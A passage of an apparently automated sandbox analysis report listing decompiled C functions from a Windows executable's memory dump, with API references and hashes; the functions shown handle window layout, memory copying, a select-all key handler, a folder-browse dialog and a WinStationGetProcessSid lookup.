                                                                                      • MapWindowPoints.USER32 ref: 00405D32
                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4247780290-0
                                                                                      • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                      • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				void* _t20;
                                                                                      				void* _t21;
                                                                                      				signed int _t28;
                                                                                      				void* _t32;
                                                                                      				void* _t34;
                                                                                      
                                                                                      				_t20 = __eax;
                                                                                      				_v12 = _v12 & 0x00000000;
                                                                                      				_push(__ebx);
                                                                                      				_t28 = __eax - 1;
                                                                                      				L0040B26C();
                                                                                      				_v16 = __eax;
                                                                                      				if(_t28 > 0) {
                                                                                      					_t21 = _a4;
                                                                                      					_v8 = __ebx;
                                                                                      					_v8 =  ~_v8;
                                                                                      					_t32 = _t28 * __ebx + _t21;
                                                                                      					_a4 = _t21;
                                                                                      					do {
                                                                                      						memcpy(_v16, _a4, __ebx);
                                                                                      						memcpy(_a4, _t32, __ebx);
                                                                                      						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                      						_a4 = _a4 + __ebx;
                                                                                      						_t32 = _t32 + _v8;
                                                                                      						_t34 = _t34 + 0x24;
                                                                                      						_v12 = _v12 + 1;
                                                                                      						_t28 = _t28 - 1;
                                                                                      					} while (_t28 > _v12);
                                                                                      				}
                                                                                      				_push(_v16);
                                                                                      				L0040B272();
                                                                                      				return _t20;
                                                                                      			}












                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpy$??2@??3@
                                                                                      • String ID:
                                                                                      • API String ID: 1252195045-0
                                                                                      • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                      • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 76%
                                                                                      			E00406746(void* __esi) {
                                                                                      				intOrPtr _t9;
                                                                                      				intOrPtr _t10;
                                                                                      				intOrPtr _t11;
                                                                                      				intOrPtr* _t18;
                                                                                      				void* _t19;
                                                                                      
                                                                                      				_t19 = __esi;
                                                                                      				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                      				if(_t9 != 0) {
                                                                                      					_push(_t9);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                      				if(_t10 != 0) {
                                                                                      					_push(_t10);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                      				if(_t11 != 0) {
                                                                                      					_push(_t11);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                      				if(_t18 != 0) {
                                                                                      					_t11 =  *_t18;
                                                                                      					if(_t11 != 0) {
                                                                                      						_push(_t11);
                                                                                      						L0040B272();
                                                                                      						 *_t18 = 0;
                                                                                      					}
                                                                                      					_push(_t18);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                      				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                      				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                      				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                      				return _t11;
                                                                                      			}









                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                      • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                      				struct HDWP__* _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				void* __ebx;
                                                                                      				intOrPtr _t37;
                                                                                      				intOrPtr _t42;
                                                                                      				RECT* _t44;
                                                                                      
                                                                                      				_push(__ecx);
                                                                                      				_push(__ecx);
                                                                                      				_t42 = __ecx;
                                                                                      				_v12 = __ecx;
                                                                                      				if(_a4 != 5) {
                                                                                      					if(_a4 != 0xf) {
                                                                                      						if(_a4 == 0x24) {
                                                                                      							_t37 = _a12;
                                                                                      							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                      							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                      						}
                                                                                      					} else {
                                                                                      						E00402EC8(__ecx + 0x378);
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v8 = BeginDeferWindowPos(3);
                                                                                      					_t44 = _t42 + 0x378;
                                                                                      					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                      					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                      					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                      					EndDeferWindowPos(_v8);
                                                                                      					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                      					_t42 = _v12;
                                                                                      				}
                                                                                      				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                      			}










                                                                                      APIs
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                      • String ID: $
                                                                                      • API String ID: 2498372239-3993045852
                                                                                      • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                      • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                      				int _t14;
                                                                                      
                                                                                      				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                      					GetKeyState(0xa2);
                                                                                      					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                      						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                      							_t14 = E00403A60(0xa5);
                                                                                      							if(_t14 == 0) {
                                                                                      								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                      			}





                                                                                      APIs
                                                                                      • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                        • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                      • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: State$CallMessageProcSendWindow
                                                                                      • String ID: A
                                                                                      • API String ID: 3924021322-3554254475
                                                                                      • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                      • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                      				intOrPtr _v20;
                                                                                      				char _v1072;
                                                                                      				void _v3672;
                                                                                      				char _v4496;
                                                                                      				intOrPtr _v4556;
                                                                                      				char _v4560;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t41;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				_t45 = __eflags;
                                                                                      				E0040B550(0x11cc, __ecx);
                                                                                      				E00402923( &_v4560);
                                                                                      				_v4560 = 0x40db44;
                                                                                      				E00406670( &_v4496, _t45);
                                                                                      				_v4496 = 0x40dab0;
                                                                                      				memset( &_v3672, 0, 0x10);
                                                                                      				E0040A909( &_v1072);
                                                                                      				_t41 = _a4;
                                                                                      				_v4556 = 0x71;
                                                                                      				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                      					L0040B266();
                                                                                      					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                      				}
                                                                                      				_v4496 = 0x40dab0;
                                                                                      				_v4560 = 0x40db44;
                                                                                      				E004067AC( &_v4496);
                                                                                      				return E00402940( &_v4560);
                                                                                      			}














                                                                                      APIs
                                                                                        • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                      • memset.MSVCRT ref: 00403537
                                                                                      • _ultow.MSVCRT ref: 00403575
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset$_ultow
                                                                                      • String ID: cf@$q
                                                                                      • API String ID: 3448780718-2693627795
                                                                                      • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                      • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                      				void _v514;
                                                                                      				signed short _v516;
                                                                                      				void _v1026;
                                                                                      				signed short _v1028;
                                                                                      				void* __esi;
                                                                                      				void* _t17;
                                                                                      				intOrPtr* _t26;
                                                                                      				signed short* _t28;
                                                                                      
                                                                                      				_v516 = _v516 & 0x00000000;
                                                                                      				_t26 = __ecx;
                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                      				_v1028 = _v1028 & 0x00000000;
                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                      				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                      				_t28 =  &_v516;
                                                                                      				E00407250(_t28, _t17);
                                                                                      				_push(_t28);
                                                                                      				_push(L"</%s>\r\n");
                                                                                      				_push(0xff);
                                                                                      				_push( &_v1028);
                                                                                      				L0040B1EC();
                                                                                      				return E00407343(_t26, _a4,  &_v1028);
                                                                                      			}












                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407E48
                                                                                      • memset.MSVCRT ref: 00407E5F
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407E8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                      • String ID: </%s>
                                                                                      • API String ID: 3400436232-259020660
                                                                                      • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                      • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                      				void _v8198;
                                                                                      				short _v8200;
                                                                                      				void* _t9;
                                                                                      				void* _t12;
                                                                                      				intOrPtr _t19;
                                                                                      				intOrPtr _t20;
                                                                                      
                                                                                      				_t19 = __ecx;
                                                                                      				_t9 = E0040B550(0x2004, __ecx);
                                                                                      				_t20 = _t19;
                                                                                      				if(_t20 == 0) {
                                                                                      					_t20 =  *0x40fe24; // 0x0
                                                                                      				}
                                                                                      				_t25 =  *0x40fb90;
                                                                                      				if( *0x40fb90 != 0) {
                                                                                      					_v8200 = _v8200 & 0x00000000;
                                                                                      					memset( &_v8198, 0, 0x2000);
                                                                                      					_push(_t20);
                                                                                      					_t12 = 5;
                                                                                      					E00405E8D(_t12);
                                                                                      					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                      						SetWindowTextW(_a4,  &_v8200);
                                                                                      					}
                                                                                      					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}










                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                      • String ID: caption
                                                                                      • API String ID: 1523050162-4135340389
                                                                                      • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                      • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                      				struct HINSTANCE__* _t11;
                                                                                      				struct HINSTANCE__** _t14;
                                                                                      				struct HINSTANCE__* _t15;
                                                                                      
                                                                                      				_t14 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                      					_t11 = E00405436(L"winsta.dll");
                                                                                      					 *_t14 = _t11;
                                                                                      					if(_t11 != 0) {
                                                                                      						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                      					}
                                                                                      				}
                                                                                      				_t15 = _t14[1];
                                                                                      				if(_t15 == 0) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                      				}
                                                                                      			}







                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                      • API String ID: 946536540-379566740
                                                                                      • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                      • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
                                                                                      			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                      				signed int _t21;
                                                                                      				signed int _t23;
                                                                                      				void* _t24;
                                                                                      				signed int _t31;
                                                                                      				void* _t33;
                                                                                      				void* _t44;
                                                                                      				signed int _t46;
                                                                                      				void* _t48;
                                                                                      				signed int _t51;
                                                                                      				int _t52;
                                                                                      				void** _t53;
                                                                                      				void* _t58;
                                                                                      
                                                                                      				_t53 = __esi;
                                                                                      				_t1 =  &(_t53[1]); // 0x0
                                                                                      				_t51 =  *_t1;
                                                                                      				_t21 = 0;
                                                                                      				if(_t51 <= 0) {
                                                                                      					L4:
                                                                                      					_t2 =  &(_t53[2]); // 0x8
                                                                                      					_t33 =  *_t53;
                                                                                      					_t23 =  *_t2 + _t51;
                                                                                      					_t46 = 8;
                                                                                      					_t53[1] = _t23;
                                                                                      					_t24 = _t23 * _t46;
                                                                                      					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                      					L0040B26C();
                                                                                      					_t10 =  &(_t53[1]); // 0x0
                                                                                      					 *_t53 = _t24;
                                                                                      					memset(_t24, 0,  *_t10 << 3);
                                                                                      					_t52 = _t51 << 3;
                                                                                      					memcpy( *_t53, _t33, _t52);
                                                                                      					if(_t33 != 0) {
                                                                                      						_push(_t33);
                                                                                      						L0040B272();
                                                                                      					}
                                                                                      					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                      					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                      				} else {
                                                                                      					_t44 =  *__esi;
                                                                                      					_t48 = _t44;
                                                                                      					while( *_t48 != 0) {
                                                                                      						_t21 = _t21 + 1;
                                                                                      						_t48 = _t48 + 8;
                                                                                      						_t58 = _t21 - _t51;
                                                                                      						if(_t58 < 0) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							goto L4;
                                                                                      						}
                                                                                      						goto L7;
                                                                                      					}
                                                                                      					_t31 = _t21 << 3;
                                                                                      					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                      					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                      				}
                                                                                      				L7:
                                                                                      				return 1;
                                                                                      			}
















                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 1865533344-0
                                                                                      • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                      • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                      				void* _v8;
                                                                                      				wchar_t* _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				char _v40;
                                                                                      				long _v564;
                                                                                      				char* _t18;
                                                                                      				char* _t22;
                                                                                      				wchar_t* _t23;
                                                                                      				intOrPtr* _t24;
                                                                                      				intOrPtr* _t26;
                                                                                      				intOrPtr _t30;
                                                                                      				void* _t35;
                                                                                      				char* _t36;
                                                                                      
                                                                                      				_t18 =  &_v8;
                                                                                      				_t30 = 0;
                                                                                      				__imp__SHGetMalloc(_t18);
                                                                                      				if(_t18 >= 0) {
                                                                                      					_v40 = _a4;
                                                                                      					_v28 = _a8;
                                                                                      					_t22 =  &_v40;
                                                                                      					_v36 = 0;
                                                                                      					_v32 = 0;
                                                                                      					_v24 = 4;
                                                                                      					_v20 = E0040AC81;
                                                                                      					_v16 = __esi;
                                                                                      					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                      					_t36 = _t22;
                                                                                      					if(_t36 != 0) {
                                                                                      						_t23 =  &_v564;
                                                                                      						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                      						if(_t23 != 0) {
                                                                                      							_t30 = 1;
                                                                                      							wcscpy(__esi,  &_v564);
                                                                                      						}
                                                                                      						_t24 = _v8;
                                                                                      						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                      						_t26 = _v8;
                                                                                      						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                      					}
                                                                                      				}
                                                                                      				return _t30;
                                                                                      			}


                                                                                      APIs
                                                                                      • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                      • wcscpy.MSVCRT ref: 0040AD65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 3917621476-0
                                                                                      • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                      • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                      Uniqueness

